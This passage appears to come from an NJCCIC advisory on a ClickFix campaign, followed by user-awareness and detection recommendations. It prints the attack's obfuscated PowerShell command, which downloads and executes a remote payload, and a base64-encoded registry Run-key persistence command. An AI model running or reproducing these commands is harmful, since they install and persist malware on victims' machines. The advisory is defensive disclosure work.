ClickFix Command:
powershell "$<wbr />iNqI3BnIyB8I2khIWUhISEheCMuUkV<wbr />wbEFjRS;$FAZ='VNJSMDIMS
DCNSENDMCLOFPAMQXJDFHDKS';<wbr />FUNCTION MPE {Invoke-Expression (Invoke-RestMethod 94.159.113[.]37/ssd[.]png)}; $BJI=$FAZ[6]+$FAZ[13]+$FAZ[23]<wbr />;MPE;$<wbr />iNqI3BnIyB8I2khIWUhISEhS"
Note: The user is redirected to a legitimate website if the ClickFix command succeeds, which is handled through a server-side check, likely based on IP address.
Establishing Persistence:
Registry Key: HKEY_CURRENT_USER\SOFTWARE\<wbr />Microsoft\Windows\<wbr />CurrentVersion\Run\Microsoft
Data: powershell iex(::ASCII.<wbr />GetString
(::FromBase64String('<wbr />aXJtIDgwLjY0LjE5LjE0OC94LmpwZy<wbr />B8aWV4')))
Recommendations
- Exercise caution while online, verifying any unusual requests or instructions.
- Facilitate user awareness training to include these types of social engineering-based techniques.
- Maintain robust and up-to-date endpoint detection tools on every endpoint.
- Confirm requests from senders via contact information obtained from verified and official sources.
- Review the Don't Take the Bait! Phishing and Other Social Engineering Attacks NJCCIC product for more information on common phishing and social engineering attacks.
- Report social engineering and other malicious cyber activity to the NJCCIC and the FBI's IC3.
